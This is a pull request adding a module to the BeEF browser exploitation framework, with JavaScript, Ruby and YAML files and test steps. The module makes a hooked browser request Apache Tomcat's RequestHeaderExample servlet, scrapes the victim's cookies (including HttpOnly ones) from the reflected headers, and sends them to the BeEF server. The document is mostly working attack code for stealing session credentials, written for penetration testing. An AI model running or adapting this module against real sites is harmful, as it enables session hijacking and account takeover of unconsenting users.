### PR TITLE
Modules: Add apache_tomcat_examples_cookie_disclosure module

### DIFF
--- a/modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/command.js
+++ b/modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/command.js
@@ -1,0 +1,53 @@
+//
+// Copyright (c) 2006-2021 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  request_header_servlet_path = "<%= @request_header_servlet_path %>";
+
+  function parseResponse() {
+    var cookie_dict = {};
+
+    if (xhr.readyState == 4) {
+      if (xhr.status == 404) {
+        beef.debug("[apache_tomcat_examples_cookie_disclosure] RequestHeaderExample not found");
+        return;
+      }
+
+      if (xhr.status != 200) {
+        beef.debug("[apache_tomcat_examples_cookie_disclosure] Unexpected HTTP response status " + xhr.status)
+        return;
+      }
+
+      if (!xhr.responseText) {
+        beef.debug("[apache_tomcat_examples_cookie_disclosure] No response content")
+        return;
+      }
+
+      beef.debug("[apache_tomcat_examples_cookie_disclosure] Received HTML content (" + xhr.responseText.length + " bytes)");
+
+      var content = xhr.responseText.replace(/\r|\n/g,'').match(/<table.*?>(.+)<\/table>/)[0];
+
+      if (!content || !content.length) {
+        beef.debug("[apache_tomcat_examples_cookie_disclosure] Unexpected response: No HTML table in response")
+        return;
+      }
+
+      var cookies = content.match(/cookie<\/td><td>(.+)<\/td>?/)[1].split('; ');
+      for (var i=0; i<cookies.length; i++) {
+        var s_c = cookies[i].split('=', 2);
+        cookie_dict[s_c[0]] = s_c[1];
+      }
+      var result = JSON.stringify(cookie_dict);
+
+      beef.net.send("<%= @command_url %>", <%= @command_id %>, "cookies=" + result);
+    }
+  }
+		
+  var xhr = new XMLHttpRequest();
+  xhr.onreadystatechange = parseResponse;
+  xhr.open("GET", request_header_servlet_path, true);
+  xhr.send();
+});

--- a/modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/config.yaml
+++ b/modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/config.yaml
@@ -1,0 +1,15 @@
+#
+# Copyright (c) 2006-2021 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+      apache_tomcat_examples_cookie_disclosure:
+            enable: true
+            category: ["Browser", "Hooked Domain"]
+            name: "Apache Tomcat RequestHeaderExample Cookie Disclosure"
+            description: "This module uses the Apache Tomcat examples web app (if installed) in order to read the victim's cookies, even if issued with the HttpOnly attribute."
+            authors: ["bcoles"]
+            target:
+                working: ["All"]

--- a/modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/module.rb
+++ b/modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/module.rb
@@ -1,0 +1,19 @@
+#
+# Copyright (c) 2006-2021 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Apache_tomcat_examples_cookie_disclosure < BeEF::Core::Command
+
+  def self.options
+    [
+      {'name' => 'request_header_servlet_path', 'ui_label' => "'Request Header Example' path", 'value' => '/examples/servlets/servlet/RequestHeaderExample'},
+    ]
+  end
+
+	def post_execute
+		content = {}
+		content['cookies'] = @datastore['cookies']
+		save content
+	end
+end


### PR DESCRIPTION
## Category

Apache Tomcat RequestHeaderExample Cookie Disclosure module.

## Feature Description

I still encounter Apache Tomcat with the `examples` app deployed from time to time. The examples include a `RequestHeaderExample` servlet which returns request headers in the HTTP response body, including all cookies. This offers a trivial method to bypass `HttpOnly` protection on cookies. This is an old and well known technique that has existed for at least 5 years (likely much longer).

![RequestHeaderExample servlet](https://user-images.githubusercontent.com/434827/138582056-a73d4c7a-afca-42cb-b38a-09aa3223f6ac.png)

![All your cookies are belong to BeEF](https://user-images.githubusercontent.com/434827/138582055-2be20ad1-13cb-4173-8bca-3c27beba0220.png)


## Test Cases

1. Install Apache Tomcat. I used bitnami: https://bitnami.com/stack/tomcat/virtual-machine
2. Ensure the `examples` application is installed and deployed.
3. Browse to a page on the server which issues cookies. Most of the JSP examples at `/examples/jsp/` (such as `/examples/jsp/jsp2/simpletag/hello.jsp`) will generate cookies (with `HttpOnly`).
4. Hook a browser from a page on the Tomcat server (a lazy option is to use the BeEF bookmarklet).
5. Run the `Apache Tomcat RequestHeaderExample Cookie Disclosure` module from the `Browser` -> `Hooked Domain` category.
6. Observe that all cookies from the hooked origin were returned to BeEF.
